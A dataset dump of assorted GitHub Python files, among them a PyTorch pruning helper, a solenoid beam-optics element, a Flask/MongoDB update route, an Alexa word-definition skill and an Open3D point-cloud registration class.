if device is None:\n                    device = torch.device(\"cpu\")\n                input_data = torch.Tensor(*input_shape).to(device)\n            else:\n                input_data = dummy_input\n            if opset_version is not None:\n                torch.onnx.export(self.bound_model, input_data, onnx_path, opset_version = opset_version)\n            else:\n                torch.onnx.export(self.bound_model, input_data, onnx_path)\n\n            if dummy_input is None:\n                _logger.info(\"Model in onnx with input shape %s saved to %s\", input_data.shape, onnx_path)\n            else:\n                _logger.info(\"Model in onnx saved to %s\", onnx_path)\n        self._warp_model()\n\n    def load_model_state_dict(self, model_state):\n        \"\"\"\n        Load the state dict saved from unwrapped model.\n\n        Parameters\n        ----------\n        model_state : dict\n            state dict saved from unwrapped model\n        \"\"\"\n        if self.is_wrapped:\n            self._unwarp_model()\n            self.bound_model.load_state_dict(model_state)\n            self._warp_model()\n        else:\n            self.bound_model.load_state_dict(model_state)\n\n    def get_pruned_weights(self, dim = 0):\n        \"\"\"\n        Log the simulated prune sparsity.\n\n        Parameters\n        ----------\n        dim : int\n            the pruned dim.\n        \"\"\"\n        for _, wrapper in enumerate(self.get_modules_wrapper()):\n            weight_mask = wrapper.weight_mask\n            mask_size = weight_mask.size()\n            if len(mask_size) == 1:\n                index = torch.nonzero(weight_mask.abs() != 0).tolist()\n            else:\n                sum_idx = list(range(len(mask_size)))\n                sum_idx.remove(dim)\n                index = torch.nonzero(weight_mask.abs().sum(sum_idx) != 0).tolist()\n\n            _logger.info(f\"simulated prune {wrapper.name} remain/total : {len(index)}/{weight_mask.size(dim)}\")\n    ","repo_name":"AICTechnologyGroup/TorchSlim","sub_path":"optimization/pruning/core/pruner.py","file_name":"pruner.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
{"seq_id":"40156993778","text":"\"\"\"\ntask_5_1\nIn the project directory, create a log directory in which loggers for the client and server sides\nare created in separate modules named client_log_config.py and server_log_config.py;\n\"\"\"\n\nimport socket\nimport sys\nimport json\n\n\ndef get_message(client):\n    encoded_response = client.recv(MAX_PACKAGE_LENGTH)\n    if 
isinstance(encoded_response, bytes):\n        json_response = encoded_response.decode(ENCODING)\n        response = json.loads(json_response)\n        if isinstance(response, dict):\n            return response\n        raise ValueError\n    raise ValueError\n\n\ndef send_message(sock, message):\n    js_message = json.dumps(message)\n    encoded_message = js_message.encode(ENCODING)\n    sock.send(encoded_message)\n\n\nif __name__ == '__main__':\n    # Default port for network communication\n    DEFAULT_PORT = 7777\n    # Default IP address for the client connection\n    DEFAULT_IP_ADDRESS = '127.0.0.1'\n    # Maximum connection queue\n    MAX_CONNECTIONS = 5\n    # Maximum message length in bytes\n    MAX_PACKAGE_LENGTH = 1024\n    # Project encoding\n    ENCODING = 'utf-8'\n\n    # Main keys of the JIM protocol:\n    ACTION = 'action'\n    TIME = 'time'\n    USER = 'user'\n    ACCOUNT_NAME = 'account_name'\n\n    # Other keys used in the protocol\n    PRESENCE = 'presence'\n    RESPONSE = 'response'\n    ERROR = 'error'\n    RESPONDEFAULT_IP_ADDRESSSE = 'respondefault_ip_addressse'\n","repo_name":"AndyMcMagadan/client_server_apps","sub_path":"hw_5_1.py","file_name":"hw_5_1.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19402150934","text":"import numpy as np\n\nfrom ocelot.cpbd.tm_params.first_order_params import FirstOrderParams\nfrom ocelot.cpbd.high_order import m_e_GeV\nfrom ocelot.cpbd.elements.element import Element\n\n\nclass SolenoidAtom(Element):\n    \"\"\"\n    Solenoid\n    l - length in m,\n    k - strength B0/(2B*rho)\n    \"\"\"\n\n    def __init__(self, l=0., k=0., eid=None):\n        Element.__init__(self, eid)\n        self.k = k  # B0/(2B*rho)\n        self.l = l\n\n    def __str__(self):\n        s = 'Solenoid('\n        s += 'l=%7.5f, ' % self.l if self.l != 0. else \"\"\n        s += 'k=%8.6e, ' % self.k if np.abs(self.k) > 1e-15 else \"\"\n        s += 'eid=\"' + str(self.id) + '\")' if self.id is not None else \")\"\n        return s\n\n    def create_first_order_main_params(self, energy: float, delta_length: float = None) -> FirstOrderParams:\n        R = self.R_main_matrix(energy=energy, length=delta_length if delta_length != None else self.l)\n        B = self._default_B(R)\n        return FirstOrderParams(R, B, self.tilt)\n\n    def R_main_matrix(self, energy, length):\n\n        def sol(l, k, energy):\n            \"\"\"\n            K.Brown, A.Chao.\n            :param l: effective length of solenoid\n            :param k: B0/(2*Brho), B0 is field inside the solenoid, Brho is momentum of central trajectory\n            :return: matrix\n            \"\"\"\n            gamma = energy / m_e_GeV\n            c = np.cos(l * k)\n            s = np.sin(l * k)\n            if k == 0:\n                s_k = l\n            else:\n                s_k = s / k\n            r56 = 0.\n            if gamma != 0:\n                gamma2 = gamma * gamma\n                beta = np.sqrt(1. - 1. 
/ gamma2)\n r56 -= l / (beta * beta * gamma2)\n sol_matrix = np.array([[c * c, c * s_k, s * c, s * s_k, 0., 0.],\n [-k * s * c, c * c, -k * s * s, s * c, 0., 0.],\n [-s * c, -s * s_k, c * c, c * s_k, 0., 0.],\n [k * s * s, -s * c, -k * s * c, c * c, 0., 0.],\n [0., 0., 0., 0., 1., r56],\n [0., 0., 0., 0., 0., 1.]]).real\n return sol_matrix\n\n return sol(length, k=self.k, energy=energy)\n","repo_name":"ocelot-collab/ocelot","sub_path":"ocelot/cpbd/elements/solenoid_atom.py","file_name":"solenoid_atom.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"40374418516","text":"from flask import render_template,Blueprint,redirect, request, render_template\r\nimport pymongo\r\n\r\nupdatee=Blueprint('update',__name__)\r\n\r\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\nmydb = myclient[\"Day2\"]\r\ntrainers=mydb.Trainers.find({})\r\nmycol = mydb[\"Trainers\"]\r\ndef next_id():\r\n x = mydb.Trainers.find({}).sort(\"_id\", -1).limit(1)\r\n id = 0\r\n for i in x:\r\n id = i['_id']\r\n return id+1 if x!=0 else redirect('/home')\r\n\r\n\r\n@updatee.route('/update/',methods=[\"POST\",\"GET\"])\r\ndef update(id):\r\n mycol = mydb[\"Trainers\"]\r\n if request.method == 'POST':\r\n\r\n uname = request.form.get('Username')\r\n uage = request.form.get('National')\r\n course = request.form.get('Course')\r\n mycol.update_one({\"_id\":id},{\"$set\": {\"Username\": uname, \"National\": uage, \"Course\": course}})\r\n\r\n return redirect('/home')\r\n else:\r\n\r\n trainers =list( mydb.Trainers.find({'_id':id}))\r\n return render_template('traine/update.html', tr=trainers)\r\n","repo_name":"MahmoudShawke/FLASK-CRUD-SYTEM","sub_path":"views/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9393384549","text":"#coding=utf-8\n\nimport unittest\nimport time\nfrom selenium import webdriver\nfrom page.loginf_page import LoginPage\nfrom page.auditing_coupon_page import AuditingCouponPage\nfrom common.logger import logger as log\n\nclass TestAuditingCoupon(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.driver=webdriver.Firefox()\n cls.loginf_page=LoginPage(cls.driver)\n cls.auditing_coupon_page=AuditingCouponPage(cls.driver)\n\n def test_auditing_coupon(self):\n #登录\n self.loginf_page.login()\n time.sleep(10)\n #获取实际结果\n re=self.auditing_coupon_page.main()\n #期望结果\n log.info(\"re\")\n\n def tearDown(self):\n self.driver.close()\n\nif __name__==\"__main__\":\n unittest.main()\n\n","repo_name":"loveyshelly/yy","sub_path":"case/test_auditing_coupon.py","file_name":"test_auditing_coupon.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32335931862","text":"arr = []\r\n\r\nwhile 1:\r\n try:\r\n val = list(input().split())\r\n val[1] = int(val[1])\r\n arr.append(val)\r\n except EOFError:\r\n break\r\n\r\narr.sort(key=lambda x: x[1])\r\nprint(arr[0][0])\r\n\r\n","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/6830.py","file_name":"6830.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27966373876","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : 
int(inputing())\n\n# r,l = wow()\n# garo_dict = {} # 정면\n# sero_dict = {} # 측면\n# for sero in range(r):\n# a = list(wow())\n# for garo in range(l):\n# if garo not in garo_dict:\n# garo_dict[garo]=[a[garo]]\n# else:\n# garo_dict[garo]+=[a[garo]] \n# sero_dict[sero]=a\n# sero_max = {} #측면 최댓값\n# for i in range(r):\n# index = sero_dict[i].index(max(sero_dict[i]))\n# if index not in sero_max:\n# sero_max[index]=[max(sero_dict[i])]\n# else:\n# sero_max[index]+=[max(sero_dict[i])]\n# # print(sero_max)\n# cnt = 0\n# for garo in range(l):\n# # print(garo_dict[garo])\n# pass_list = [max(garo_dict[garo])]\n# if garo in sero_max:\n# pass_list+=sero_max[garo]\n# cnt+=sum(garo_dict[garo])-sum(list(set(pass_list)))\n# print(cnt)\n\nfor _ in range(one()):\n a = one()\n a_str = list(str(a))\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2022/5월/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72197229609","text":"def submit_pyspark_job(dataproc, project, region,\n cluster_name, bucket_name, filename):\n \"\"\"Submits the Pyspark job to the cluster, assuming `filename` has\n already been uploaded to `bucket_name`\"\"\"\n job_details = {\n 'projectId': project,\n 'job': {\n 'placement': {\n 'clusterName': cluster_name\n },\n 'pysparkJob': {\n 'mainPythonFileUri': 'gs://{}/{}'.format(bucket_name, filename)\n }\n }\n }\n result = dataproc.projects().regions().jobs().submit(\n projectId=project,\n region=region,\n body=job_details).execute()\n job_id = result['reference']['jobId']\n print('Submitted job ID {}'.format(job_id))\n return job_id\n","repo_name":"expz/past2present","sub_path":"dataproc/submit_job_to_cluster.py","file_name":"submit_job_to_cluster.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25727435659","text":"# -*- coding: UTF-8 -*-\n\nimport pandas as pd\nimport xlrd\nimport pyecharts.options as opts\nfrom pyecharts.charts import Timeline, Bar\nimport matplotlib.pyplot as plt\n\nfrom pyecharts.globals import CurrentConfig\n\n\nCurrentConfig.ONLINE_HOST = \"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\learn_pytorch\\\\kang_homework\\\\pyecharts-assets-master\\\\pyecharts-assets-master\\\\assets\"\n# CurrentConfig.ONLINE_HOST = 'D:/python/pyecharts-assets-master/assets/'\n\n# 提取编程语言名字\nname = list(pd.read_excel('language_data.xlsx')['Programing'].drop_duplicates())#['Programing'].drop_duplicates()\nprint(name)\ndata = xlrd.open_workbook('language_data.xlsx')\n\ntable = data.sheets()[0]\nprint(table.nrows)\ndic1 = {k: [] for k in name}\n# 各编程语言对应每年里不同时间的热度\nfor i in range(1, table.nrows):\n x = table.row_values(i)\n dic1[x[0]].append((x[1], x[2]))\n\n\n\n# for k, v in dic1.items():#k是语言,v是年份和数据\n# print(k)\n# print(v)\n #for j in v: # v (时间,热度) 热度数据添加进各年对应的列表里\n #print(j[1])\n\n\n# 与编程语言顺序对应 每年编程语言对应的不同时间的热度\ndata_per = {k: [[] for x in range(10)] for k in range(2001, 2023)}\n\n\ncount = 0\nfor k, v in dic1.items():\n for j in v: # v (时间,热度) 热度数据添加进各年对应的列表里\n\n data_per[int(j[0][:4])][count].append(eval(j[1])) # 一年里各编程语言不同时间时的热度 对应起来\n count += 1\nprint(data_per)\n\ndata_per1 = {k: [] for k in list(data_per.keys())}\n\nfor k, v in list(data_per.items()):\n for x in v:\n if len(x) == 0: # 这一年里该语言没有热度数据\n data_per1[k].append(0)\n else:\n avg = sum(x) / len(x)\n data_per1[k].append(avg) 
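
# A one-pass sketch of the same averaging, for comparison only — it assumes
# data_per holds the per-year lists built above, and the name data_per1_alt
# is illustrative rather than part of the original script:
data_per1_alt = {
    year: [sum(vals) / len(vals) if vals else 0 for vals in rows]
    for year, rows in data_per.items()
}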
# 这一年里的平均热度\n\n# 得到TOBIE现在排Top20的编程语言从2001年���始每年的平均热度\nprint(data_per1)\n\n\ndef get_year_overlap_chart(year) -> Bar:\n sum_info = [(m, n) for m, n in zip(name, data_per1[year])]\n # 编程语言按每年平均热度排序\n sum_info.sort(key=lambda z: z[1], reverse=True)\n name_ = [m[0] for m in sum_info]\n datas = [m[1] for m in sum_info]\n\n #print(sum_info)\n # 每根柱子的颜色列表\n colors = ['#00BFFF', '#0000CD', '#000000', '#008000', '#FF1493', '#FFD700', '#FF4500', '#00FA9A', '#191970',\n '#9932CC']\n color = ['#F0F8FF', '#FAEBD7', '#00FFFF', '#7FFFD4', '#F0FFFF', '#F5F5DC', '#FFE4C4', '#000000', '#FFEBCD',\n '#0000FF']\n x = []\n\n # 绘制柱形图\n\n plt.figure(figsize=(24, 8))\n plt.xlabel('language', fontsize=20)\n plt.ylabel('{:}year'.format(year), fontsize=20)\n plt.bar(name_,datas,width=0.3,color=['#00BFFF', '#0000CD', '#000000', '#008000', '#FF1493', '#FFD700', '#FF4500', '#00FA9A', '#191970',\n '#9932CC'])\n plt.show()\n\n\n# for y in range(2010,2021):\n# get_year_overlap_chart(y)\n# 生成时间轴的图\n# timeline = Timeline(init_opts=opts.InitOpts(width=\"1200px\", height=\"600px\"))\n# for y in range(2009, 2020):\n# timeline.add(get_year_overlap_chart(y), time_point=str(y))\n#\n# timeline.add_schema(is_auto_play=True, play_interval=1000)\n# timeline.render(\"language_2009_2019(1).html\")\n","repo_name":"ShitK/2022project","sub_path":"work_2.py","file_name":"work_2.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24707532923","text":"\"\"\"\nThis sample demonstrates a simple skill built with the Amazon Alexa Skills Kit.\nThe Intent Schema, Custom Slots, and Sample Utterances for this skill, as well\nas testing instructions are located at http://amzn.to/1LzFrj6\nFor additional samples, visit the Alexa Skills Kit Getting Started guide at\nhttp://amzn.to/1LGWsLG\n\"\"\"\n\nfrom __future__ import print_function\nimport urllib, json, time, urllib2\nimport bs4\nimport requests\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to the Define Word. 
\" \\\n \"Please ask me questions like Tell me the meaning of Love.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please tell me word for which you want the meaning.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef getHelpMessage():\n session_attributes = {}\n card_title = \"Help Content\"\n speech_output = \"You can ask me questions like Tell me the meaning of Love.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please ask me questions like Tell me the meaning of Love.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef getErrorMessage():\n session_attributes = {}\n card_title = \"Help Content\"\n speech_output = \"If you just said something then I can't understand it. \" \\\n \"Please ask me questions like Tell me the meaning of Love.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please ask me questions like Tell me the meaning of Love.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying Define Word. \" \\\n \"Have a nice day! 
\"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\ndef getMeaning(intent, session):\n \"\"\" Get the word meaning and prepares the speech to reply to the user.\n \"\"\"\n card_title = \"Define Word\"\n session_attributes = {}\n should_end_session = True\n speech_output = \"Sorry, Meaning not found for the given word.\"\n if 'Word' in intent['slots']:\n word = intent['slots']['Word']\n if 'value' in word:\n word = word['value']\n if word == \"\":\n return getErrorMessage()\n else:\n url = 'https://www.google.co.in/search?q=define%20' + word + '#cns=1'\n headers = {\"user-agent\": \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\"}\n response = requests.get(url, headers=headers)\n html = response.content\n final_soup = bs4.BeautifulSoup(html, \"html5lib\")\n everyThing = final_soup.select(\"div._Jig\")\n if len(everyThing) > 0:\n speech_output = \"The meaning of \" + word + \" is \" + everyThing[0].text.split('.')[0]\n else:\n return getErrorMessage()\n else:\n return getErrorMessage()\n reprompt_text = \"Please ask me questions like Tell me the meaning of Love.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"DefineWordIntent\":\n return getMeaning(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return getHelpMessage()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) 
The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])","repo_name":"manishbisht/Define-Word","sub_path":"deployment_package/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":7815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28169581751","text":"class Cliente:\r\n \r\n def __init__(self):\r\n #interes 1 de acuerdo con estudio, interes 0 no desea estudio\r\n #historia 1 cuenta con calificación, historia 0 no cuenta con calificación\r\n self.Edad = int(input('Ingrese su edad '))\r\n self.Interesestudio = int(input('Ingrese 1 si desea el estudio, de lo contrario ingrese 0: ')) # conocer o aplicar credito\r\n self.Histocredito = int(input('Ingrese 1 si cuenta con calificación, de lo contrario ingrese 0: '))\r\n \r\n\r\n def ingreso (self):\r\n if self.Interesestudio == 0:\r\n Cliente.egresos # aplicar cliente.estudio de paso 2\r\n else:\r\n print(\"puedes recorrer la plataforma\") # Conocer\r\n\r\n \r\n def calificacioninicial (self):\r\n if self.Histocredito == 1:\r\n self.Calestudio = int(input(\"Por favor ingrese su calificación numérica: \"))\r\n #Cliente.analisis interpretación de resultados paso 4\r\n if self.Calestudio>= 700:\r\n print(\"Manejo correcto\\n\")\r\n elif (self.Calestudio>=400 and self.Calestudio <=699):\r\n print(\"Manejo Aceptable\\n\")\r\n elif self.Calestudio<400:\r\n print(\"Manejo Crítico\\n\") \r\n elif Cliente.egresos: \r\n pass # aplicar cliente.estudio de paso 2\r\n else: \r\n print(\"Ingrese una calificación válida\") \r\n\r\n\r\nclass Egresos():\r\n def __init__(self):\r\n self.consolidadogasto = []\r\n\r\n def tablagasto(self):\r\n self.secuenciagasto = input(\"Por favor ingrese un número a su gasto: \")\r\n self.nomgasto = input(\"Por favor ingrese el nombre del gasto: \")\r\n self.nomfrecuencia = input(\"Por favor ingrese frecuencia\\n 1 mensual\\n 2 quincenal\\n 4 semanal\\n y 30 diario\\n \")\r\n self.nomvalor = input(\"Por favor ingrese el valor del gasto: \")\r\n nuevogasto = (self.nomgasto, self.nomfrecuencia, self.nomvalor)\r\n self.consolidadogasto.append(nuevogasto) # Pendiente que acumule gastos en la misma tabla\r\n print(\"Nuevo gasto incluido\")\r\n print( self.consolidadogasto)\r\n \r\n \r\n \r\n\r\n\r\n# cliente1= Cliente()\r\n# cliente1.calificacioninicial()\r\negreso1= 
Egresos()\r\negreso1.tablagasto()\r\n","repo_name":"sansoris/Hackaton","sub_path":"ClasePersona.py","file_name":"ClasePersona.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8820374127","text":"import sys\nimport numpy as np\nfrom funciones import *\n\n#%%\n\ndef PrimesLessThan(n):\n Papuchis = np.arange(2,n)\n Primates = []\n for num in Papuchis:\n if IsPrime(num):\n Primates.append(num)\n return Primates\n\n#%%\n\nprint (PrimesLessThan(int(sys.argv[1])))\n","repo_name":"juanitopereza/Basics","sub_path":"PrimesLessThan.py","file_name":"PrimesLessThan.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11655155268","text":"import functools\n\nimport open3d as o3d\nimport palettable\nimport numpy as np\nfrom tqdm import tqdm\nimport copy\n\n\nclass ReconstructionSystem():\n p = {\n \"voxelSize\": 0.018,\n \"radiusFeature\": 5., # radiusFeature*voxelSize\n \"radiusNormal\": 2., # radiusFeature*voxelSize\n \"FPFHdistanceThreshold\": 1.5,\n \"ICPdistanceThreshold\": 0.8,\n \"useICP\": True, # 是否使用ICP精配准\n \"useRANSC\": False, # 是否使用RANSC粗配准,如果是FALSE,使用fast配准 ,\n }\n\n def __init__(self):\n self.origionData = []\n self.trans = []\n self.colors = [[l[0] / 255, l[1] / 255, l[2] / 255] for l in palettable.mycarta.get_map(\"CubeYF_20\").colors]\n\n def _preprocessData(self, cloud: o3d.geometry.PointCloud) -> (\n o3d.geometry.PointCloud, o3d.pipelines.registration.Feature):\n pcdDown = cloud.voxel_down_sample(self.p['voxelSize'])\n rediusFeature = self.p['voxelSize'] * self.p['radiusFeature']\n rediusNormal = self.p['voxelSize'] * self.p['radiusNormal']\n pcdDown.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=rediusNormal, max_nn=30)\n )\n pcdFpfh = o3d.pipelines.registration.compute_fpfh_feature(\n pcdDown,\n o3d.geometry.KDTreeSearchParamHybrid(radius=rediusFeature, max_nn=100)\n )\n return pcdDown, pcdFpfh\n\n def _registerPairCloud(self, source: o3d.geometry.PointCloud, target: o3d.geometry.PointCloud):\n sourceDown, sourceFpfh = self._preprocessData(source)\n targetDown, targetFpfh = self._preprocessData(target)\n distanceThreshold = self.p['voxelSize'] * self.p['FPFHdistanceThreshold']\n if self.p[\"useRANSC\"]:\n result = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n sourceDown, targetDown, sourceFpfh, targetFpfh, False,\n distanceThreshold,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(False),\n 6,\n [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(0.9),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(distanceThreshold),\n ],\n o3d.pipelines.registration.RANSACConvergenceCriteria(400000, 1000)\n )\n else:\n result = o3d.pipelines.registration.registration_fast_based_on_feature_matching(\n sourceDown, targetDown, sourceFpfh, targetFpfh,\n o3d.pipelines.registration.FastGlobalRegistrationOption(\n maximum_correspondence_distance=distanceThreshold,\n # iteration_number=2000\n )\n )\n if self.p[\"useICP\"]:\n distance_threshold = self.p['voxelSize'] * self.p['ICPdistanceThreshold']\n result = o3d.pipelines.registration.registration_icp(\n source, target, distance_threshold, result.transformation,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(),\n o3d.pipelines.registration.ICPConvergenceCriteria(\n relative_fitness=1e-5\n )\n )\n assert isinstance(result, 
o3d.pipelines.registration.RegistrationResult)\n else:\n pass\n return result\n\n def setInputClouds(self, path_list: [str, ...]):\n tqdmbar = tqdm(path_list)\n for path in tqdmbar:\n d = o3d.io.read_point_cloud(path)\n assert isinstance(d, o3d.geometry.PointCloud)\n if d.points.__len__() >= 1000:\n\n # tqdmbar.write(f\"{path} Load successful;PointCloudSize:{d.points.__len__()}\")\n # cl, ind = d.remove_statistical_outlier(\n # nb_neighbors=200, std_ratio=2 * self.p['voxelSize']\n # )\n # d = d.select_by_index(ind)\n # tqdmbar.write(f\"{path} remove_statistical_outlier;PointCloudSize:{d.points.__len__()}\")\n\n xyz = np.asarray(d.points)\n xyz = xyz - np.mean(xyz, axis=0)\n d = o3d.geometry.PointCloud()\n d.points = o3d.utility.Vector3dVector(xyz)\n\n self.origionData.append(d)\n else:\n tqdmbar.write(f\"{path} Bad data; PointCloudSize{d.points.__len__()}\")\n for i in range(len(self.origionData)):\n self.origionData[i].paint_uniform_color(self.colors[(i * 1) % len(self.colors)])\n pass\n\n def showResult(self):\n # o3d.visualization.draw_geometries(self.origionData)\n tempData = copy.deepcopy(self.origionData)\n tempData = [cloud.voxel_down_sample(self.p['voxelSize']) for cloud in tempData]\n for i in tqdm(range(self.origionData.__len__())):\n if i == 0:\n continue\n for j in range(i):\n tempData[i].transform(self.trans[j + 1])\n targetData = functools.reduce(lambda x, y: x + y, tempData)\n assert isinstance(targetData, o3d.geometry.PointCloud)\n o3d.visualization.draw_geometries([targetData.voxel_down_sample(self.p['voxelSize'])])\n pass\n\n def getResult(self):\n pass\n\n def compute(self):\n tqdmbar = tqdm(range(len(self.origionData)))\n for i in tqdmbar:\n if i == 0:\n self.trans.append(np.identity(4))\n continue\n reg = self._registerPairCloud(self.origionData[i], self.origionData[i - 1])\n self.trans.append(reg.transformation)\n tqdm.write(f\"Fitness:{reg.fitness},rmse:{reg.inlier_rmse},nums of pairs:{reg.correspondence_set.__len__()}\")\n pass\n\n def compute2(self, K=20):\n tqdmbar = tqdm(range(len(self.origionData) // K))\n tempCloudList = []\n for i in tqdmbar:\n tempCloud = o3d.geometry.PointCloud()\n for k in range(K):\n if k == 0:\n tempCloud += self.origionData[i * K + k]\n continue\n reg = self._registerPairCloud(self.origionData[i * K + k], tempCloud)\n tempCloud += self.origionData[i * K + k].transform(reg.transformation)\n tempCloud = tempCloud.voxel_down_sample(self.p['voxelSize'])\n tempCloudList.append(tempCloud)\n o3d.io.write_point_cloud(f\"id = {i}.pcd\", tempCloud)\n ansCloud = o3d.geometry.PointCloud()\n for index, cloud in enumerate(tempCloudList):\n if index == 0:\n ansCloud += cloud\n continue\n reg = self._registerPairCloud(cloud, ansCloud)\n ansCloud += cloud.transform(reg.transformation)\n ansCloud = ansCloud.voxel_down_sample(voxel_size=self.p['voxelSize'])\n\n return ansCloud\n\n def compute3(self):\n targetDataList = copy.deepcopy(self.origionData)\n for i in tqdm(range(len(targetDataList))):\n if i == 0:\n continue\n reg = self._registerPairCloud(targetDataList[i], self.origionData[i - 1])\n for k in range(i, len(targetDataList)):\n targetDataList[k] = targetDataList[k].transform(reg.transformation)\n targetCloud = o3d.geometry.PointCloud()\n for cloud in targetDataList:\n targetCloud += cloud\n return targetCloud.voxel_down_sample(self.p['voxelSize'])\n\n def compute4(self):\n targetCloud = o3d.geometry.PointCloud()\n for index in range(len(self.origionData)):\n if index == 0:\n targetCloud += self.origionData[index]\n continue\n reg = 
